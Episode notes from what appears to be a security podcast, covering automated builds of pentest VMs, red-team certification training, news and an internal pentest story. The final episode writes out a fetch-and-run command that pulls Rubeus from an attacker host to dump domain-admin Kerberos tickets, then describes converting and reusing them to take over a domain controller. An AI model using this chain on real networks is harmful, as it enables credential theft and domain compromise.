7MS #474: Password Cracking in the Cloud - Part 3

Happy new year! This episode continues our series on DIY pentest dropboxes with a focus on automation - specifically as it relates to automating the build of Windows 10, Windows Server 2019, Kali and Ubuntu VMs. Here's the resources I talk about in more detail on today's episode that helps make the automagic happen: Windows VMs This article from Windowscentral.com does a great job of walking you through building a Windows 10 unattended install. A key piece of the automation is the autounattend.xml file, which you can somewhat automatically build here, but I think you'll want to install the Windows System Image Manager to really get in the tech weeds and fully tweak that answer file. The handy AnyBurn utility will help you make ISOs out of your Windows 10 / Server 2019 customized builds. Ubuntu VMs I set out to build a Ubuntu 18.x box because Splashtop only supports a few Linux builds. I found a freakin' sweet project called Linux unattended installation that helps you build the preseed.cfg file (kind of like the Windows equivalent of an answer file). The area of preseed.cfg I've been spending hours dorking around with is: d-i preseed/late_command string \ Under this section you can customize things to your heart's content. For example, you could automatically pull down and install all OS packages/updates and a bunch of third party utils you want: in-target sh -c 'apt-get update'; \ in-target sh -c 'apt-get upgrade -y'; \ in-target sh -c 'apt-get install curl dnsrecon git net-tools nmap openssh-server open-vm-tools-desktop python3.8 python3-pip python-libpcap ubuntu-gnome-desktop unzip wget xsltproc -y'; \ Finally, the project provides a slick script that will wrap up your Ubuntu build plus an SSH key into a ready-to-go ISO: build-iso.sh ~/.ssh/id_rsa.pub ~/Desktop/My-kool-kustomized-Ubuntu.iso Awesome! Kali VMs There is some decent documentation on building a preseed.cfg file for Kali. But the best resource I found with some excellent prebuilt config file is this kali-preseed project. Once your seed file is built, it's super easy to simply host it on a machine in your network and let Kali pull it during install. For example, if you've got a Linux box with Python on the network at 192.168.0.7, just make a temporary folder with the preseed.cfg file in it and then run: sudo python3 -m http.server 80 Then, in your virtual environment, create a new VM and boot it to a Kali NetInstaller image. At the splash screen, hit Tab and it'll display a command line you can edit. Remove the line that says something like preseed/file=/cdrom/simple-cdd/default.preseed, add auto=true and then the URL path to your preseed file, such as url=http://192.168.0.7/preseed.cfg. The Kali will ask for a few questions, such as a username and hostname to configure, and then if you're watching your machine hosting preseed.cfg, you'll see your Kali machine grab the config file and take care of the rest from there! Got a better/cooler/funner/faster/awesomer way to do this type of automation? Let us know!

7 Jan 20211h 6min

Today, Gh0sthax and I talk about week 3/4 of the CRTP - Certified Red Team Professional training, and how it's kicking our butts a bit. Key points include: We agree this is not a certification for folks who are new to pentesting Don't expect to be following along "live" with the instructor during the training sessions You'll need to do a flippin' ton of studying and practicing on your own in between the live sessions As you follow along with the lab exercises, some things won't work - and that might be by design, but the lab manual might not give you a heads-up. In those cases, be sure to check with your classmates in the Discord channel Problems popping shells? Hint: it might not be a problem with your tools...but with your network/firewalll config! The more PowerShell skills you can walk into this training with, the better. We've got to play with some tools that were new(ish) to us: PowerUpSQL - check out these awesome cheat sheets too! HeidiSQL Rubeus If you're an absolute rockstar in the pentest labs, don't think that you'll breeze right through the exam! Some pros of this training: fast-moving, super knowledgable instructor. Outstanding content. Super value for the dollar investment - arguably the best pentest training bang for the buck. The labs themselves are quite good and realistic. You get the recordings of the live sessions after they're complete. The course covers some defense against these attacks as well - great to have the blue team perspective! A few cons: the content might be too fast-moving. It can get easy to become "lost" and forget the objective of what each lab exercise is having you do. Lab manual doesn't necessarily match the PDF slides.

30 Des 202048min

Merry Christmas! Happy holidays! Please enjoy the last cyber news edition of 2020, brought to us by our good pal Gh0stHax. Stories covered include: You've probably heard this by now, but FireEye had a breach that was truly sophisticated. Here's a really nice plain English breakdown of the situation for folks who may not be interested in the deep technical details. Chris Krebs, former CISA director, sues Trump campaign lawyer after death threats CSOOnline has a nice article on 4 security trends to watch for in 2021 which we may or may not agree with!

23 Des 202058min

Today's episode continues part 1 of our series on the Certified Red Team Professional certification. Key points from today's episode include: It's probably a better idea to run Bloodhound on your local machine so you don't crush the student VM's resources Running Invoke-Command is one of my new favorite things. Check this post for a bunch of cheatsheet tips for running commands in PowerShell against other hosts. Silver, gold and skeleton key attacks in AD - are they awesome? Yes? Do I see myself using those in short-term pentest enagements? Meh. Wanna build a home lab to do some of these fun pentest stuff? Our buddy k3nundrum in Slack recommended we check out this. It looks awesome. And the devs of the tool have a video on it here. When you're popping shells and privs all over the place in the lab, it can be confusing to figure out which machines you have what privileges on. I like using the klist command. Or, from a mimikatz prompt, try kerberos::list /export.

17 Des 202041min

Welp, I need another certification like I need a hole in the head, but that didn't stop me from signing up for the Certified Red Team Professional. So I've started a series on sharing what I'm learning as I proceed through the certification path. (We're also talking about this on the 7MS forums) Here are some of the highlights from week 1: Boy oh boy is PowerView handy for extracting juicy info out of Active Directory. It works well when served with a side order of the Microsoft signed DLL for the ActiveDirectory PowerShell module I wouldn't say this course is for beginners. You will get some high level intro to PowerShell, Active Directory and pentesting, but you will need to do a ton of self-study and banging around in the lab to fill in some skill gaps. When trying to pop a Jenkins box, I learned about a few new helpful tools I'd never played with before: HFS - simple HTTP file server Powercat - for catching shells! Then on a personal front, I have a few updates to share as well: The Thanksgiving surprise that brought tears to my eyes The new piece of exercise equipment in the Johnson household that made my wife reach for a barf bag A mysterious sound in the house that lead to the discovery of dead things over Thanksgiving break

9 Des 202056min

Happy December! Today I virtually sat down with Christopher Fielder of Arctic Wolf, who started his career in security at 18 (I was just playing a lot of video games when I was that old)! Christopher has served in the Air Force, worked for a university and SANS, served for some three-letter organizations - and more! Christopher and I had a great chat about a variety of security topics, including: Threat hunting - why it's a term that means so many things to different people, how to get started in it and how to start building a threat hunting team Threat intel - its relationship to threat hunting, and how to make sense of the jillions of intel feeds out there Pentesting your MDR/SIEM - we talk about our gist on evaluating an MDR/SIEM, and how to throw some technical tests at these systems to figure out if they're worth the cost!

2 Des 202056min

Happy Thanksgiving! While the turkey and pie settle in your belly, why not also digest some fantastic security news stories with our pal Gh0sthax? Today's stories include: It was another epic month of patching - both Threatpost and Krebs have great coverage of what you need to know. We don't support software pirating, but it's interesting that we just got a demo of Cobalt Strike spun up, and now the source code was leaked. Always download software updates from their source, not from not-so-trustworthy sources like random search results in Google and pop-up boxes. As a follow up to a story from last month, ransomware was not to blame for the death of a woman in Germany.

26 Nov 202041min

Hey friends, I dare declare this to be my favorite tale of internal pentest pwnage so far. Why? Because the episode features: Great blue team tools alerting our customer to a lot of the stuff we were doing An EDR that we tried to beat up (but it beat us up instead) SharpGPOAbuse which we talked about extensively last week Separation of "everyday" accounts from privileged accounts Multi-factor authentication bypass! Some delicious findings in GPOs thanks to Ryan Hausec's great two part series (1 and 2). If you're not sure if you're vulnerable to MS14-025, check out this great article which discusses the vulnerability and its mitigation. The final cherry on top was a new attack another pentester taught me. Use a combination of SharpCradle and Rubeus to steal logged in DA creds: SharpCradle.exe -w https://your.kali.box.ip/Rubeus.exe dump /service:krbtgt /nowrap This will give you a TGT (base64 encoded) for active logon sessions to the box. So if a DA is logged in, you can snag their TGT and then convert that into a .kirbi file on your Kali box with: echo "LooooonnnnnggggggTicketStriiiiiiiiiiinnnngggg" | base64 -d > BobTheDomainAdmin.kirb Convert the .kirbi file to a .ccache file with ticket converter. Then you can use Impacket tools to use/abuse that access to your heart's delight. We ended up using Impacket to pop a shell on a DC and add a low-priv account to DA. The interesting thing is that the alert the blue team received essentially said "The DC itself added the user to the DA group" - the alert did not have attribution to the user whose ticket we stole! Good tip for future pentests!

19 Nov 20201h 9min